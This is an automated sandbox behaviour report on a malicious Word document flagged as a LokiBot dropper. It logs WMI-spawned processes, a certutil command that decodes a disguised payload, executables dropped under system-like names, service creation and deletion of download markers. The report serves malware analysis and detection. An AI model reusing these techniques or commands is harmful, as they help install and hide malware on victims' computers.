                      Source: 00000005.00000002.2252845078.00000000002FD000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: tmp_e473b4.exe, 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp, auditpolmsg.exe, 00000008.00000002.2262233717.000000000042A000.00000004.00020000.sdmp, wcnwiz.exe, 00000009.00000002.2265887565.000000000042A000.00000004.00020000.sdmp, SampleRes.exe, 0000000A.00000002.2270581839.000000000042A000.00000004.00020000.sdmp, NlsData0414.exe, 0000000B.00000002.2276043532.000000000042A000.00000004.00020000.sdmpBinary or memory string: @*\AC:\aseb\Aseb.vbp
                      Source: tmp_e473b4.exe, auditpolmsg.exe, 00000008.00000000.2256345076.0000000000401000.00000020.00020000.sdmp, wcnwiz.exe, 00000009.00000002.2265851700.0000000000401000.00000020.00020000.sdmp, SampleRes.exe, 0000000A.00000002.2270507971.0000000000401000.00000020.00020000.sdmp, NlsData0414.exe, 0000000B.00000000.2270019597.0000000000401000.00000020.00020000.sdmp, ieframe.exe, 0000000D.00000002.2285194003.0000000000401000.00000020.00020000.sdmpBinary or memory string: B*\AC:\aseb\Aseb.vbp
                      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@20/19@0/1
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,7_2_003F8970
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,8_2_00368970
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,9_2_003B8970
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,10_2_007B8970
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,11_2_002B8970
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,12_2_003E8970
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,13_2_00328970
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,14_2_00628970
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_00484C80 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,CloseHandle,CloseHandle,15_2_00484C80
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_003F5040 ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,7_2_003F5040
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ample1.docJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBEFA.tmpJump to behavior
                      Source: sample1.docOLE indicator, Word Document stream: true
                      Source: sample1.docOLE document summary: title field not present or empty
                      Source: C:\Windows\System32\certutil.exeConsole Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.9.5.9.7.2...............#.......(d......................*.......q(.v............Jump to behavior
                      Source: C:\Windows\System32\certutil.exeConsole Write: ........................................(.P.............,.......x.......................#.......(d..............................................Jump to behavior
                      Source: C:\Windows\System32\certutil.exeConsole Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .4.4.6.9.7.6.............#.......(d......................,.......................Jump to behavior
                      Source: C:\Windows\System32\certutil.exeConsole Write: ........................................(.P.............,.......x.......................#.......(d..............................................Jump to behavior
                      Source: C:\Windows\System32\certutil.exeConsole Write: ..".....................................(.P.............,.......x.......................#........3................".....b.......................Jump to behavior
                      Source: C:\Windows\System32\certutil.exeConsole Write: ........................................(.P.............,.......x.......................#........3..............(.................".............Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\certutil.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: sample1.docVirustotal: Detection: 61%
                      Source: sample1.docMetadefender: Detection: 45%
                      Source: sample1.docReversingLabs: Detection: 72%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\certutil.exe Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe C:\Users\user\AppData\Local\Temp/tmp_e473b4.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\srclient\auditpolmsg.exe C:\Windows\SysWOW64\srclient\auditpolmsg.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\mfc110\wcnwiz.exe C:\Windows\SysWOW64\mfc110\wcnwiz.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\capiprovider\SampleRes.exe C:\Windows\SysWOW64\capiprovider\SampleRes.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exe C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\KBDNO\mfc140.exe C:\Windows\SysWOW64\KBDNO\mfc140.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\advapi32\ieframe.exe C:\Windows\SysWOW64\advapi32\ieframe.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\nshipsec\cryptdll.exe C:\Windows\SysWOW64\nshipsec\cryptdll.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exe C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exe
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess created: C:\Windows\SysWOW64\srclient\auditpolmsg.exe C:\Windows\SysWOW64\srclient\auditpolmsg.exeJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeProcess created: C:\Windows\SysWOW64\mfc110\wcnwiz.exe C:\Windows\SysWOW64\mfc110\wcnwiz.exeJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeProcess created: C:\Windows\SysWOW64\capiprovider\SampleRes.exe C:\Windows\SysWOW64\capiprovider\SampleRes.exeJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exe C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeProcess created: C:\Windows\SysWOW64\KBDNO\mfc140.exe C:\Windows\SysWOW64\KBDNO\mfc140.exeJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeProcess created: C:\Windows\SysWOW64\advapi32\ieframe.exe C:\Windows\SysWOW64\advapi32\ieframe.exeJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeProcess created: C:\Windows\SysWOW64\nshipsec\cryptdll.exe C:\Windows\SysWOW64\nshipsec\cryptdll.exeJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeProcess created: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exe C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00404803 push ecx; iretd 7_2_004047EF
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00404021 push ecx; retf 7_2_00404037
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00408839 push esi; iretd 7_2_00408893
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_0040610E push ecx; retf 7_2_0040611B
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_0040A12E push ecx; iretd 7_2_0040A12F
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_004031D1 push ecx; iretd 7_2_00403233
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_0040721C pushad ; iretd 7_2_00407223
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_0040321E push ecx; iretd 7_2_00403233
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00403236 push ecx; iretd 7_2_00403287
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00405AE2 push ecx; ret 7_2_00405B3F
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_004062F6 push ebx; iretd 7_2_004062F7
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_0040AAF9 push esp; retf 7_2_0040AB17
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00403B4E push ecx; retf 7_2_00403B4F
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00404B02 push ecx; ret 7_2_00404B03
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00403B35 push ecx; retf 7_2_00403B47
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_004053DD push ecx; ret 7_2_004053E7
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00408464 push ecx; ret 7_2_0040847B
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00407C76 push ebp; retf 7_2_00407C78
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_0040A404 push ecx; ret 7_2_0040A497
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_004074C5 push ecx; iretd 7_2_004074CF
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_004044D5 push ecx; iretd 7_2_004044F3
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_004054B6 push ecx; retf 7_2_004054B7
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_0040450F push ecx; retf 7_2_00404523
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00404539 push ecx; retf 7_2_00404523
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00406DA8 push eax; retf 7_2_00406FAF
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_0040A646 push edx; iretd 7_2_0040A647
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00403E52 push eax; ret 7_2_00403E54
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00405655 push ecx; retf 7_2_0040565F
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00407E7E push ecx; iretd 7_2_00407E7F
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00409E0A push ecx; ret 7_2_00409E0B
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_0040869A push ecx; retf 7_2_0040869B

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::create
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeExecutable created and started: C:\Windows\SysWOW64\nshipsec\cryptdll.exeJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeExecutable created and started: C:\Windows\SysWOW64\KBDNO\mfc140.exeJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeExecutable created and started: C:\Windows\SysWOW64\mfc110\wcnwiz.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeExecutable created and started: C:\Windows\SysWOW64\srclient\auditpolmsg.exeJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeExecutable created and started: C:\Windows\SysWOW64\capiprovider\SampleRes.exeJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeExecutable created and started: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeExecutable created and started: C:\Windows\SysWOW64\advapi32\ieframe.exeJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeExecutable created and started: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeJump to behavior
                      Source: C:\Windows\System32\certutil.exeFile created: C:\Users\Public\Ksh1.pdfJump to dropped file
                      Source: C:\Windows\System32\certutil.exeFile created: C:\Users\Public\Ksh1.pdfJump to dropped file
                      Source: C:\Windows\System32\certutil.exeFile created: C:\Users\Public\Ksh1.pdfJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the user root directoryShow sources
                      Source: C:\Windows\System32\certutil.exeFile created: C:\Users\Public\Ksh1.pdfJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
                      Source: unknownProcess created: cmd line: ksh1.pdf
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeFile opened: C:\Windows\SysWOW64\srclient\auditpolmsg.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeFile opened: C:\Windows\SysWOW64\mfc110\wcnwiz.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeFile opened: C:\Windows\SysWOW64\capiprovider\SampleRes.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeFile opened: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeFile opened: C:\Windows\SysWOW64\KBDNO\mfc140.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeFile opened: C:\Windows\SysWOW64\advapi32\ieframe.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeFile opened: C:\Windows\SysWOW64\nshipsec\cryptdll.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeFile opened: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
